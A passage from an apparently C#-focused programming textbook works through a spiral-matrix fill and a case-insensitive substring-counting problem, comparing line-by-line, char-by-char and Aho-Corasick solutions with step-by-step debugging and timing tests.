Idea: Step by Step\n\nWe may split the implementation into a few steps. A loop runs from 0 to N²-1 and at each iteration it does the following steps:\n\n- Fill the current cell of the matrix with the next number.\n\n- Check whether the current direction should be changed and, if yes, change it and calculate the number of moves in the new direction.\n\n- Move the current position to the next cell in the current direction (e.g. one position down / left / up / right).\n\nImplementing the First Few Steps\n\nWe can represent the current position with integer variables positionX and positionY – the two coordinates for the position.
At each iteration we will move to the next cell in the current direction and positionX and positionY will change accordingly.\n\nFor modeling the behavior of filling the spiral matrix we will use the variables stepsCount (total number of moves in the current direction), stepPosition (the move number in the current direction) and stepChange (flag showing if we have to change the value of stepsCount – it increments after every 2 direction changes).\n\nLet’s see how we can implement this idea as code:\n\nfor (int i = 0; i < count; i++)\n{\n    // Fill the current cell with the current value\n    matrix[positionY, positionX] = i;\n\n    // Check for direction / step changes\n    if (stepPosition < stepsCount)\n    {\n        stepPosition++;\n    }\n    else\n    {\n        stepPosition = 1;\n        if (stepChange == 1)\n        {\n            stepsCount++;\n        }\n        stepChange = (stepChange + 1) % 2;\n        direction = (direction + 1) % 4;\n    }\n\n    // Move to the next cell in the current direction\n    switch (direction)\n    {\n        case 0:\n            positionY++;\n            break;\n        case 1:\n            positionX--;\n            break;\n        case 2:\n            positionY--;\n            break;\n        case 3:\n            positionX++;\n            break;\n    }\n}\n\nPerforming a Partial Check after the First Few Steps\n\nThis is the moment to point out how unlikely it is to write the body of such a loop correctly the first time, without making any mistakes. We already know the rule of writing the code step by step and testing after each piece of code is written, but for the body of this loop the rule is hard to apply – we have no independent subproblems which can be tested separately from each other. To test the above code we first need to finish it: to assign initial values to all the variables used.\n\nAssigning the Initial Values\n\nAfter we have a well thought-out idea for the algorithm (even if we are not completely sure that the written code will work correctly), it remains to set initial values of the already defined variables and to print the matrix obtained after the execution of the loop.\n\nIt is clear that the number of loop iterations is exactly N², and that’s why we replace the variable count with this value. From the two given examples and our own additional examples (written on paper) we determine the initial position in the matrix depending on the parity (odd / even) of its size:\n\nint positionX = n / 2; // The middle of the matrix\nint positionY = n % 2 == 0 ? (n / 2) - 1 : (n / 2); // middle row, or the row just above it when n is even\n\nTo the rest of the variables we give the following initial values (we have already explained their semantics):\n\nint direction = 0; // The initial direction is \"down\"\nint stepsCount = 1; // Perform 1 step in the current direction\nint stepPosition = 0; // 0 steps already performed\nint stepChange = 0; // Steps count will change after 2 steps\n\nPutting All Together\n\nThe last subproblem we have to solve for creating a working program is printing the matrix on the standard output. Let’s write it, then put all the code together and start testing.\n\nThe fully implemented solution is shown below.
It includes reading the input data (matrix size), filling the matrix in a spiral (calculating the matrix center and filling it cell by cell) and output the result:\n\n MatrixSpiral.cs using System;   public class MatrixSpiral {     static void Main()     {         Console.Write(\"N = \");         int n = int.Parse(Console.ReadLine());         int[,] matrix = new int[n, n];           FillMatrix(matrix, n);           PrintMatrix(matrix, n);     }       private static void FillMatrix(int[,] matrix, int n)     {         int positionX = n / 2; // The middle of the matrix         int positionY = n % 2 == 0 ? (n / 2) - 1 : (n / 2);           int direction = 0; // The initial direction is \"down\"         int stepsCount = 1; // Perform 1 step in current direction         int stepPosition = 0; // 0 steps already performed         int stepChange = 0; // Steps count changes after 2 steps           for (int i = 0; i < n * n; i++)         {             // Fill the current cell with the current value             matrix[positionY, positionX] = i;               // Check for direction / step changes             if (stepPosition < stepsCount)             {                 stepPosition++;             }             else             {                 stepPosition = 1;                 if (stepChange == 1)                 {                     stepsCount++;                 }                 stepChange = (stepChange + 1) % 2;                 direction = (direction + 1) % 4;             }               // Move to the next cell in the current direction             switch (direction)             {                 case 0:                     positionY++;                     break;                 case 1:                     positionX--;                     break;                 case 2:                     positionY--;                     break;                 case 3:                     positionX++;                     break;             }         }     }       private static void PrintMatrix(int[,] matrix, int n)     {         for (int i = 0; i < n; i++)         {             for (int j = 0; j < n; j++)             {                 Console.Write(\"{0,3}\", matrix[i, j]);             }             Console.WriteLine();         }     } }\n\nTesting the Solution\n\nAfter we have implemented the solution it is appropriate to test it with enough values of N to ensure it works properly. We start with the sample values 3 and 4 and then we check for 5, 6, 7, 8, 9, … It works well.\n\nIt is important to check the border cases: 0 and 1. They work correctly as well. We do few more tests and we make sure all cases work correctly. We might notice that when N is large (e.g. 50) the output looks ugly, but this cannot be improved much. We can add more spaces between the numbers but the console is limited to 80 characters and the result is still ugly. We will not try to improve this further.\n\nIt is not necessary to test the program for speed (performance test, for example with N=1,000) because with a very big N the output will be extremely large and the task will be pointless.\n\nWe cannot find any non-working cases so we assume the algorithm and its implementation are both correct and the problem is successfully solved.\n\nNow we are ready for the next problem from the exam.\n\nWe are given a text file words.txt, which contains several words, one per each line. Each word consists of Latin letters only. Write a program, which retrieves the number of matches of each of the given words as a substring in the file text.txt. 
The counting is case insensitive. The result should be written into a text file named result.txt in the following format (the words should appear in the same order as given in the input file words.txt):\n\n --> -->\n\nSample input file words.txt:\n\nSample input file text.txt:\n\n The Telerik Academy for software development engineers is a famous center for free professional training of .NET experts. Telerik Academy offers courses designed to develop practical computer programming skills. Students graduated the Academy are guaranteed to have a job as a software developers in Telerik.\n\nSample result file result.txt:\n\n for --> 2 academy --> 3 student --> 1 Java --> 0 develop --> 3 CAD --> 3\n\nBelow are the locations of the matched words from the above example:\n\n The Telerik Academy for software development engineers is a famous center for free professional training of .NET experts. Telerik Academy offers courses designed to develop practical computer programming skills. Students graduated the Academy are guaranteed to have a job as a software developers in Telerik.\n\nStart Thinking on the Problem\n\nThe emphasis of the given problem seems not so much on the algorithm, but on its technical implementation. In order to write the solution we must be familiar with working with files in C# and with the basic data structures, as well as string processing in .NET Framework.\n\nInventing an Idea for a Solution\n\nWe get a piece of paper, write few examples and we come up with the following idea: we read the words file, scan through the text and check each word from the text for matches with the preliminary given list of words and increase the counter for each matched word.\n\nChecking the Idea\n\nThe above idea for solving the task is trivial but we can still check it by writing down on a piece of paper the sample input (words and text) and the expected result. We just scan through the text word by word in our paper example and when we find a match with some of the preliminary given words (as a substring) we increment the counter for the matched word. The idea works in our example.\n\nNow let’s think of counterexamples. In the same time we might also come with few questions regarding the implementation:\n\n-     How do we scan the text and search for matches? We can scan the text character by character or line by line or we can read the entire text in the memory and then scan it in the memory (by string matching or by a regular expression). All of these approaches might work correctly but the performance could vary, right? We will think about the performance a bit later.\n\n-     How do we extract the words from the text? Maybe we can read the text and split it by all any non-letter characters? Where shall we take these non-letter characters from? Or we can read the text char by char and once we find a non-letter character we will have the next word from the text? The second idea seems faster and will require less memory because we don’t need to read all the text at once. We should think about this, right?\n\n-     How do we match two words? This is a good question. Very good question. Suppose we have a word from the text and we want to match it with the words from the file words.txt. For example, we have “Academy” in the text and we should find whether it matches as substring the “CAD” word from the list of words. This will require searching each word from the list as a substring in each word from the text. Also can we have some word appearing several times inside another? 
This is possible, right?\n\nFrom all the above questions we can conclude that we don’t need to read the text word by word. We need to match substrings, not words! The title of the problem is misleading. It says “Counting Words in a Text File” but it should be “Counting Substrings in a Text File”.\n\nIt is really good that we found we have to match substrings (instead of words), before we have implemented the code for the above idea, right?\n\nInventing a Better Idea\n\nNow, considering the requirement for substring matching, we come with few new and probably better ideas about solving the problem:\n\n-     Scan the text line by line and for each line from the text and each word check how many times the word appears as substring in the line. The last can be counted with String.IndexOf(…) method in a loop. We already have solved this subproblem in the chapter “Strings and Text Processing” (see the section “Finding All Occurrences of a Substring”).\n\n-     Read the entire text and count the occurrences of each word in it (as a substring). This idea is very similar to the previous idea but it will require much memory to read the entire text. Maybe this will not be efficient. We gain nothing, but potentially we will run “out of memory”.\n\n-     Scan the text char by char and store the read characters in a buffer. After each character read we check if the text in the buffer ends with some of the words from the list. We will not need to search the words in the buffer because we check for each word after each character is read. We could also clear the buffer when we read any non-letter character (because the list of words for matching should contain letters only). Thus the memory consumption will be very low.\n\nThe first and the last idea seem to be good. Which of them to implement? Maybe we could implement both of them and choose the faster one. Having two solutions will also improve the testing because we should get identical results with both of the solutions on all test cases.\n\nChecking the New Ideas\n\nWe have two good ideas and we need to check them for correctness before thinking about implementation. How to check the ideas? We can invent a good test case on a piece of paper and try the ideas on it.\n\nLet’s have the following list of words:\n\n Word S MissingWord DS aa\n\nWe might be interested to find the number of occurrences of the above words in the following text:\n\nThe expected result is as follows:\n\n Word --> 9 S --> 13 MissingWord --> 0 DS --> 2 aa --> 3\n\nIn the above example we have many different special cases: whole-word matching, matching as a substring, matching in different casing, matches in the start / end of the text, several matches inside the same word, overlapping matches, etc. This example is a very good representative of the common case for this problem. It is important to have such short but comprehensive test case when solving programming problems. It is important to have it early, when checking the ideas, before any code is written. This avoids mistakes, catches incorrect algorithms and saves time!\n\nChecking the Line by Line Algorithm\n\nNow let’s check the first algorithm: read the two lines of text and check how many times each of the words from the given list occurs in each line ignoring the character casing. At the first line we find as substrings (ignoring the case) “word” 5 times, “s” 3 times, “MissingWord” 0 times, “aa” 0 times and “ds” – 1 time. 
At the second line we find as substrings (ignoring the case) “word” 4 times, “s” 10 times, “MissingWord” 0 times, “aa” 3 times and “ds” – 1 time. We sum the occurrences and we find that the result is correct.

We try to find counterexamples, but we can’t. The algorithm may not work with words spanning multiple lines, but this is not possible by definition. It may also have issues with overlapping matches like finding “aa” in “AAaA”. This will definitely be checked after the algorithm is implemented.

Checking the Char by Char Algorithm

Let’s check the other algorithm: scan through the text char by char, holding the characters in a buffer. After each character, if the buffer ends with some of the words (ignoring the character casing), the occurrences of the matched word are increased. If a non-letter character occurs, the buffer is cleared.

We start with an empty buffer and append the first char from the text, “W”, to the buffer. None of the words match the end of the buffer. We append “o” and the buffer holds “Wo”. No matches. Then we append “r”. The buffer holds “Wor”. Again no matches are found with any of the words. We append the next char “d” and the buffer holds “Word”. We have found a match with a word from the list: “word”. We increase the number of occurrences of the matched word from zero to one. The next char is “?” and we clear the buffer, because it is not a letter. The next char is “ ” (space). We again clear the buffer. The next char is “W”. We append it to the buffer. No matches with any of the words. We continue further and further… After the last character is processed, the algorithm finishes and the results are correct.

We try to find counterexamples, but we can’t. The algorithm may not work with words spanning multiple lines, but this is not possible by definition.

Decompose the Problem into Subproblems

Now let’s try to divide the problem into subproblems. This should be done separately for both algorithms we want to try, because they differ significantly.

Line by Line Algorithm Decomposed into Subproblems

Let’s decompose the line by line algorithm into subproblems (sub-steps):

1.  Read the input words. We can read the file words.txt by using File.ReadAllLines(…). It reads a text file into a string[] array of lines.

2.  Process the lines of the text one by one to count the occurrences of each word in it. Initially assign zero occurrences to each word. Read the input file text.txt line by line. For each line from the text and for each word check the number of its occurrences (this is a separate subproblem) and increase the counters for each match. The occurrence counting should be case-insensitive.

3.  Count the number of occurrences of a certain substring in a certain text. This is a separate subproblem. We find the leftmost occurrence of the substring in the text through string.IndexOf(…). If the returned index is > -1 (the substring exists), we increase the counter and find the next occurrence of the substring to the right of the last found index. We perform this in a loop until we get -1 as a result, which means that there are no more matches. To perform case-insensitive searching we can pass a special parameter StringComparison.OrdinalIgnoreCase to the IndexOf() method.

4.  Print the results.
Process all words and for each word print it along with its counter holding its occurrences in the output file result.txt.\n\nChar by Char Algorithm Decomposed into Subproblems\n\nLet’s decompose the char by char algorithm into subproblems (sub-steps):\n\n1.  Read the input words. We can read the file words.txt by using File.ReadAllLines(…). It reads a text file in a string[] array of lines. The original words can be saved and a copy of them in lowercase can be made to simplify the matching with ignoring the character casing.\n\n2.  Process the text char by char. Read the input file text.txt and append the letters into a buffer (StringBuilder). After each letter appended check whether the text in the buffer ends with some of the words in the input list of words (this check is a separate subproblem). If so, increase the number occurrences of the matched word. If a non-letter character is found, clean the buffer. Letters are converted to lowercase before added in the buffer.\n\n3.  Check whether a certain text (StringBuilder) ends by a certain string. In case the string has length n lower than the length of the text, the result is false. Otherwise the n letters of the string should be compared one by one with the last n letters of the text. If a mismatch is found, the result is false. If all checks pass, the result is true.\n\n4.  Print the results. Process all words and for each word print it along with its counter holding its occurrences in the output file result.txt.\n\nIn the line by line algorithm we don’t have any need of special data structures. We can keep the words in an array or list of strings. We can keep the number of occurrences for each word in array of integer values. The text lines we can keep in strings.\n\nIn the char by char algorithm the situation is similar. We don’t need any special data structures. We can keep the words in an array or list of strings. We can keep the number of occurrences for each word in array of integer values. The buffer for the characters we can implement by StringBuilder (because we need to append chars many times).\n\nFollowing the guidelines for problem solving from the chapter “Methodology of Problem Solving” we should think about the efficiency and performance before writing any code.\n\nThe line by line algorithm will process the entire text line by line and for each text line it will search for all of the words. Thus if the text has a total size of t characters and the number of words are w, the algorithm will totally perform w string searches in t characters. Each search for a word in the text will pass through the entire text (at least once, but maybe not always). If we assume that searching for a word in a text is a linear time operation, we will have w scans through the entire text, so the excepted running time in quadratic: O(w*t). If we search in MSDN or in Internet, we will be unable to find any information about how exactly String.IndexOf(…) works internally and whether it runs in linear time or it is slower. This method calls a Win32 API function so it cannot be decompiled. Thus the best way to check its performance is by measuring.\n\nThe char by char algorithm will process the entire text char by char and for each character it will perform a string matching for each of the words. Suppose the text has t characters and the number of the words is w. In the average case the string matching will run in constant time (it will require just one check if the first letter is not matching, two checks if the first letter matches, etc.). 
In the worst case the string matching will require n comparisons where n is the length of the word being matched. Thus in the average case the expected running time of the algorithm will be quadratic: O(w*t). In the worst case it will be significantly slower.\n\nIt seems like the line by line algorithm is expected to run faster but we are uncertain about how fast is string.IndexOf(…), so this cannot be definitely stated. If we are at an exam, we will probably choose to implement the line by line algorithm. Just for the experiment, let’s implement both of them and compare their performance.\n\nImplementation: Step by Step\n\nIf we directly follow the steps, which we have already identified we can write the code with ease. Of course it is better to implement the algorithms step-by-step, to find and fix the bugs early.\n\nLine by Line Algorithm: Step by Step Implementation\n\nWe can start implementing the line by line algorithm for word counting in a text file from the method that counts how many times a substring appears in a text. It should look like the following:\n\n static int CountOccurrences(  string substring, string text) {     int count = 0;     int index = 0;     while (true)     {         index = text.IndexOf(substring, index);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nLet’s test it before going further:\n\n Console.WriteLine(     CountOccurrences(\"hello\", \"Hello World Hello\"));\n\nThe result is 0 – wrong! It seems like we have forgotten to ignore the character casing. Let’s fix this. We need to change the name of the method as well and add the StringComparison.OrdinalIgnoreCase option when searching for the given substring:\n\n static int CountOccurrencesIgnoreCase(     string substring, string text) {     int count = 0;     int index = 0;     while (true)     {         index = text.IndexOf(substring, index,             StringComparison.OrdinalIgnoreCase);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nLet’s test again with the same example. The program hangs! What happens? We step through the code using the debugger and we find that the variable index takes the first occurrence at position 0 and at the next iteration it takes the same occurrence again at position 0 and the program enters into an endless loop. This is easy to fix. Just start searching from position index+1 (the next position on the right), not from index:\n\n static int CountOccurrencesIgnoreCase(     string substring, string text) {     int count = 0;     int index = 0;     while (true)     {         index = text.IndexOf(substring, index + 1,             StringComparison.OrdinalIgnoreCase);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nWe run the fixed code with the same test. Now the result is incorrect (1 occurrence instead of 2). We again trace the program with the debugger and we find that the first match is at position 12. 
Immediately we find out why this happens: initially we start from position 1 (index + 1 when index is 0) and we skip the start of the text (position 0).\n\nThis is easy to fix:\n\n static int CountOccurrencesIgnoreCase(     string substring, string text) {     int count = 0;     int index = -1;     while (true)     {         index = text.IndexOf(substring, index + 1,             StringComparison.OrdinalIgnoreCase);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nWe test again with the same example and finally the result is correct. We take another, more complex test:\n\nThe result is again correct (9 matches). We test with missing word and the result is again correct (0 matches). This is enough. We assume the method works correctly. Now let’s continue with the next step: read the words.\n\nThere is no need to test this code. It is too simple to have bugs. We will test it when we test the entire solution. Let’s not write the main logic of the program which reads the text line by line and counts the occurrences of each of the input words in each of the lines:\n\n int[] occurrences = new int[words.Length]; using (StreamReader text = File.OpenText(\"text.txt\")) {     string line;     while ((line = text.ReadLine()) != null)     {         for (int i = 0; i < words.Length; i++)         {             string word = words[i];             int wordOccurrences =                 CountOccurrencesIgnoreCase(word, line);             occurrences[i] += wordOccurrences;         }     } }\n\nThis code definitely should be tested but it will be easier to write the code which prints the results to simplify testing. Let’s do this:\n\n using (StreamWriter result = File.CreateText(\"result.txt\")) {     for (int i = 0; i < words.Length; i++)     {         result.WriteLine(\"{0} --> {1}\", words[i], occurrences[i]);     } }\n\nThe complete implementation of the line by line string occurrences counting algorithms looks as follows:\n\n CountSubstringsLineByLine.cs using System; using System.IO;   public class CountSubstringsLineByLine {     static void Main()     {         // Read the input list of words         string[] words = File.ReadAllLines(\"words.txt\");           // Process the file line by line         int[] occurrences = new int[words.Length];         using (StreamReader text = File.OpenText(\"text.txt\"))         {             string line;             while ((line = text.ReadLine()) != null)             {                 for (int i = 0; i < words.Length; i++)                 {                     string word = words[i];                     int wordOccurrences =                         CountOccurrencesIgnoreCase(word, line);                     occurrences[i] += wordOccurrences;                 }             }         }           // Print the result         using (StreamWriter result = File.CreateText(\"result.txt\"))         {             for (int i = 0; i < words.Length; i++)             {                 result.WriteLine(\"{0} --> {1}\",                     words[i], occurrences[i]);             }         }     }       static int CountOccurrencesIgnoreCase(         string substring, string text)     {         int count = 0;         int index = -1;         while (true)         {             index = text.IndexOf(substring, index + 1,                 StringComparison.OrdinalIgnoreCase);             if (index == -1)             {                 // No more matches                 break;             }             
count++;         }         return count;     } }\n\nTesting the Line by Line Algorithm\n\nNow let’s test the entire code of the program. We try our test and it works as expected!\n\n text.txt Word? We have few words: first word, second word, third word. Some passwords: PASSWORD123, @PaSsWoRd!456, AAaA, !PASSWORD words.txt Word S MissingWord DS aa result.txt Word --> 9 S --> 13 MissingWord --> 0 DS --> 2 aa --> 3\n\nWe also try the sample test from the problem description and it also works correctly. We try few other tests and all they work correctly. We try also few border cases like empty text and empty list of words. All these cases are handled correctly. It seems like our line by line word counting algorithm and its implementation correctly solve the problem.\n\nWe need to conduct only a performance test but let’s first implement the other algorithm to be able to compare which is faster.\n\nChar by Char Algorithm: Step by Step Implementation\n\nLet’s now implement the char by char string occurrences counting algorithm. We will need a StringBuilder to hold the characters we read and a method to check for a match at the end of the StringBuilder. Let’s define this method first. For more flexibility it can be implemented as extension method to the StringBuilder class (recall how extension methods work from the chapter “Lambda Expressions and LINQ”):\n\n static bool EndsWith(this StringBuilder buffer, string str) {     for (int bufIndex = buffer.Length-str.Length, strIndex = 0;         strIndex < str.Length;         bufIndex++, strIndex++)     {         if (buffer[bufIndex] != str[strIndex])         {             return false;         }     }     return true; }\n\nLet’s test the method with a sample text and its ending:\n\n Console.WriteLine(     new StringBuilder(\"say hello\").EndsWith(\"hello\"));\n\nThis test produces a correct result: True. Let’s test the negative case:\n\n Console.WriteLine(new StringBuilder(\"abc\").EndsWith(\"xx\"));\n\nThis test produces a correct result: False. Let’s test what will happen if the ending is longer than the test:\n\n Console.WriteLine(new StringBuilder(\"a\").EndsWith(\"abcdef\"));\n\nWe get IndexOutOfRangeException. We found a bug! It is easy to fix – we can return false if the ending string is longer than the text where it should be found:\n\n static bool EndsWith(this StringBuilder buffer, string str) {     if (buffer.Length < str.Length)     {         return false;     }     for (int bufIndex = buffer.Length - str.Length, strIndex = 0;         strIndex < str.Length;         bufIndex++, strIndex++)     {         if (buffer[bufIndex] != str[strIndex])         {             return false;         }     }     return true; }\n\nWe run all the tests again and all of them pass. We assume the above method is correctly implemented.\n\nNow let’s continue with the step-by-step implementation. 
Let’s implement the reading of the words:\n\nThis is the same code from the line by line algorithm and it should work.\n\nLet’s now implement the main program logic which reads the text char by char in a buffer of characters and after each letter checks all input words for matches at the ending of the buffer:\n\n int[] occurrences = new int[words.Length]; using (StreamReader text = File.OpenText(\"text.txt\")) {     StringBuilder buffer = new StringBuilder();     int nextChar;     while ((nextChar = text.Read()) != -1)     {         char ch = (char)nextChar;         if (char.IsLetter(ch))         {             // A letter is found --> check all words for matches             buffer.Append(ch);             for (int i = 0; i < words.Length; i++)             {                 string word = words[i];                 if (buffer.EndsWith(word))                 {                     occurrences[i]++;                 }             }         }         else         {             // A non-letter character is found --> clean the buffer             buffer.Clear();         }     } }\n\nTo test the code we will need few lines of code to print the output:\n\n using (StreamWriter result = File.CreateText(\"result.txt\")) {     for (int i = 0; i < words.Length; i++)     {         result.WriteLine(\"{0} --> {1}\",             words[i], occurrences[i]);     } }\n\nNow the program is completed and we should test it.\n\nTesting the Char by Char Algorithm\n\nLet’s test the entire code of the program. We try our test and it fails. The produced result is incorrect:\n\n Word --> 1 S --> 6 MissingWord --> 0 DS --> 0 aa --> 0\n\nWhat’s wrong? Maybe the character casing? Do we compare the characters in case-insensitive fashion? No. We found the problem.\n\nHow to fix the character casing? Maybe we need to fix the EndsWith(…) method. We search in MSDN and in Internet and we cannot find a method to compare case-insensitively characters. We can do something like this:\n\n if (char.ToLower(ch1) != char.ToLower(ch2)) …\n\nThe above code will work but it will convert the characters to lowercase many times, at each character comparison. This may be slow so it is better to lowercase the words and the text preliminary before comparing. If we lowercase the words, they will be printed in lowercase at the output and this will be incorrect. So we need to remember the original words and to make a copy of them in lowercase. Let’s try it. 
We can use the built-in extension methods from System.Linq to perform the lowercase conversion:\n\n string[] wordsOriginal = File.ReadAllLines(\"words.txt\"); string[] wordsLowercase =     wordsOriginal.Select(w => w.ToLower()).ToArray();\n\nWe need to apply few other fixes and finally we get the following full source code of the char by char algorithm for counting the occurrences of a list of substrings in given text:\n\n CountSubstringsCharByChar.cs using System.IO; using System.Linq; using System.Text;   public static class CountSubstringsCharByChar {     static void Main()     {         // Read the input list of words         string[] wordsOriginal = File.ReadAllLines(\"words.txt\");         string[] wordsLowercase =             wordsOriginal.Select(w => w.ToLower()).ToArray();           // Process the file char by char         int[] occurrences = new int[wordsLowercase.Length];         StringBuilder buffer = new StringBuilder();         using (StreamReader text = File.OpenText(\"text.txt\"))         {             int nextChar;             while ((nextChar = text.Read()) != -1)             {                 char ch = (char)nextChar;                 if (char.IsLetter(ch))                 {                     // A letter is found --> check all words for matches                     ch = char.ToLower(ch);                     buffer.Append(ch);                     for (int i = 0; i < wordsLowercase.Length; i++)                     {                       string word = wordsLowercase[i];                       if (buffer.EndsWith(word))                       {                           occurrences[i]++;                       }                     }                 }                 else                 {                     // A non-letter is found --> clean the buffer                     buffer.Clear();                 }             }         }           // Print the result         using (StreamWriter result = File.CreateText(\"result.txt\"))         {             for (int i = 0; i < wordsOriginal.Length; i++)             {                 result.WriteLine(\"{0} --> {1}\",                     wordsOriginal[i], occurrences[i]);             }         }     }       static bool EndsWith(this StringBuilder buffer, string str)     {         if (buffer.Length < str.Length)         {             return false;         }         for (int bufIndex = buffer.Length-str.Length, strIndex = 0;             strIndex < str.Length;             bufIndex++, strIndex++)         {             if (buffer[bufIndex] != str[strIndex])             {                 return false;             }         }         return true;     } }\n\nWe need to test again with our example. Now the program works. The result is correct:\n\n Word --> 9 S --> 13 MissingWord --> 0 DS --> 2 aa --> 3\n\nWe test with all other tests we have (the test from the problem statement, the border cases, etc.) and all of them pass correctly.\n\nTesting for Performance\n\nNow it is time to test for performance both our solutions. We need a big test. We can do it with copy-paste. It is easy to copy-paste the text from our text example 10,000 times and its words 100 times. The repeating words might cause inaccuracies in performance measuring so we manually replace the last 26 words with the letters from “a” to “z”. We also play a bit with the rectangular selection in Visual Studio ([Alt] + mouse selection) and we insert the alphabet as a vertical column in few other places. 
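As a side note, the large input does not have to be prepared entirely by hand – a small throwaway program could generate files of a similar size. The sketch below is only an illustration: the input file names (sample-text.txt, sample-words.txt) and the repetition counts are assumptions chosen to match the sizes described here, and it does not reproduce the manual tweaks (replacing some words with single letters) mentioned above:

 using System.IO;
 using System.Text;

 public class GenerateBigInput
 {
     static void Main()
     {
         // Repeat the 2-line sample text 10,000 times --> about 20,000 lines
         string sampleText = File.ReadAllText("sample-text.txt");
         StringBuilder bigText = new StringBuilder();
         for (int i = 0; i < 10000; i++)
         {
             bigText.AppendLine(sampleText.Trim());
         }
         File.WriteAllText("text.txt", bigText.ToString());

         // Repeat the 5-line sample word list 100 times --> about 500 words
         string sampleWords = File.ReadAllText("sample-words.txt");
         StringBuilder bigWords = new StringBuilder();
         for (int i = 0; i < 100; i++)
         {
             bigWords.AppendLine(sampleWords.Trim());
         }
         File.WriteAllText("words.txt", bigWords.ToString());
     }
 }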
One way or another, we end up with about 20,000 lines of text (1.2 MB) and 500 words (3 KB).

To measure the execution time we add two lines of code – one before the first line of the Main() method and one after its last line:

 static void Main()
 {
     DateTime startTime = DateTime.Now;
     // The original code goes here
     Console.WriteLine(DateTime.Now - startTime);
 }

First we execute the line by line algorithm and it does not seem very fast. On an average computer from 2008 it prints the following result:

 00:01:33.6393559

After that we execute the char by char algorithm. It produces the following output:

 00:00:18.1080357

Unbelievable! Our char by char processing algorithm is more than 5 times faster than the line by line processing algorithm! But … it is still slow! 18 seconds for a 1 MB file is not fast. What about processing a 500 MB input and searching for 10,000 words?

Invent a Better Idea (Again)

If we were at the exam, we would have to decide whether to take the risk and submit the char by char solution or to spend more time thinking of a faster algorithm. This depends on how much time remains until the end of the exam, how many problems we have already solved, how hard the unsolved problems are, etc. Suppose we have enough time and we want to think more.

What makes our solution slow? If we have 500 words, we check each of them at every character. We do 500 * length(text) string comparisons. The text is scanned only once (char by char). This cannot be improved, right? If we do not scan the entire text, we will be unable to find all occurrences. So if we want to improve the performance, we should look at how to check the words faster after each character is read, right? For 500 words we perform 500 checks after each character is read. This is slow! Can’t we do it faster?

In fact, after each character we perform a kind of search for a matching word in a list of words. From the data structures we know that this takes linear time. Also, from the data structures we know that the fastest data structure for searching is the hash-table. OK, can’t we use a hash table? Instead of searching the words by trying each of them one by one, can’t we directly find the word we need through a hash-table lookup?

We take a sheet of paper and a pencil and we start making sketches and thinking. Suppose we have the text “passwords” and the word “s”. We can check the word that we obtain as we append the letters one after another: “p”, “pa”, “pas”, …, “passwords”.

In this case we will never match the word “s”, right? In fact, when we find a word in the text, we should check all its substrings in the hash table. For example, if the text is “passwords”, all its substrings are:

 p, pa, a, pas, as, s, pass, ass, ss, s, passw, assw, ssw, sw, w, passwo, asswo, sswo, swo, wo, o, passwor, asswor, sswor, swor, wor, or, r, password, assword, ssword, sword, word, ord, rd, d, passwords, asswords, sswords, swords, words, ords, rds, ds, s

There are 45 substrings of the word “passwords”. In a word of n characters we have n*(n+1)/2 substrings. This will work well for short words (e.g. 3-4 characters) and will be slow for long words (e.g. 15-20 characters). A rough sketch of this hash-table idea is shown below, for comparison.

This gets us to another thought: such a multi-pattern matching problem should have a standard solution. Why don’t we search for it on the Internet? We try to search for “multi-pattern matching algorithm” in Google and after exploring the first few results we learn about the Aho-Corasick string matching algorithm.
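Before moving on to the library-based solution, here is roughly what a suffix-lookup variant of the hash-table idea described above could look like. This is only a sketch, not the Aho-Corasick algorithm, and the class and method names are made up: it keeps the lowercased words in a HashSet<string> and, after each letter, checks every suffix of the current buffer that is not longer than the longest word, replacing the “check all 500 words” step with at most max-word-length hash lookups per character:

 using System;
 using System.Collections.Generic;
 using System.Linq;
 using System.Text;

 public static class SuffixLookupSketch
 {
     // Counts the occurrences of each word (case-insensitive) by checking
     // every suffix of the current letter buffer against a hash set of words
     public static int[] CountOccurrences(string text, string[] words)
     {
         string[] wordsLower = words.Select(w => w.ToLower()).ToArray();
         var wordSet = new HashSet<string>(wordsLower);
         var counts = new Dictionary<string, int>();
         foreach (string w in wordsLower) counts[w] = 0;
         int maxLen = wordsLower.Max(w => w.Length);

         var buffer = new StringBuilder();
         foreach (char c in text)
         {
             if (char.IsLetter(c))
             {
                 buffer.Append(char.ToLower(c));
                 // Only suffixes not longer than the longest word can match
                 int start = Math.Max(0, buffer.Length - maxLen);
                 for (int i = start; i < buffer.Length; i++)
                 {
                     string suffix = buffer.ToString(i, buffer.Length - i);
                     if (wordSet.Contains(suffix))
                     {
                         counts[suffix]++;
                     }
                 }
             }
             else
             {
                 buffer.Clear(); // the words consist of letters only
             }
         }
         return wordsLower.Select(w => counts[w]).ToArray();
     }
 }

Whether such a sketch would actually beat the EndsWith(…) approach depends on the word lengths – for long words it still degrades – which is exactly why a dedicated multi-pattern algorithm is preferable.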
Once we know the algorithm name we search for “Aho Corasick C#” and we find a nice C# implementation: https://github.com/tupunco/Tup.AhoCorasick. The theory says that after we have a new idea, we should check it for correctness. The best way to check this idea is by putting the code we found in action. In fact we do not implement the algorithm. We just try to adopt it to solve the problem we have.\n\nCounting Substrings with the Aho-Corasick Algorithm\n\nFrom the open-source implementation of the Aho-Corasick multi-pattern string matching algorithm mentioned above we can take the class AhoCorasickSearch and put it in action. We write a new solution of the substring counting problem based on what we have learned from the previous solutions. We find all matches of all words by the SearchAll(…) method of the AhoCorasickSearch class. Then we use a hash-table to count the number of occurrences for each of the words. To ensure we ignore the character casing we convert the text and the words into lowercase. This is the code:\n\n CountSubstringsAhoCorasick.cs using System; using System.Collections.Generic; using System.Linq; using System.IO;   class CountSubstringsAhoCorasick {     static void Main()     {         DateTime startTime = DateTime.Now;           // Read the input list of words         string[] wordsOriginal = File.ReadAllLines(\"words.txt\");         string[] wordsLowercase =             wordsOriginal.Select(w => w.ToLower()).ToArray();           // Read the text         string text = File.ReadAllText(\"text.txt\").ToLower();           // Find all word matches and count them         var search = new AhoCorasickSearch();         var matches = search.SearchAll(text, wordsLowercase);         Dictionary occurrences =             new Dictionary();         foreach (string word in wordsLowercase)         {             occurrences[word] = 0;         }         foreach (var match in matches)         {             string word = match.Match;             occurrences[word]++;         }           // Print the result         using (StreamWriter result = File.CreateText(\"result.txt\"))         {             foreach (string word in wordsOriginal)             {                 result.WriteLine(\"{0} --> {1}\", word,                     occurrences[word.ToLower()]);             }         }           Console.WriteLine(DateTime.Now - startTime);     } }\n\nWe test the above code with all tests we already have and it seems to work correctly. We try the performance test and this time we can be amazed by 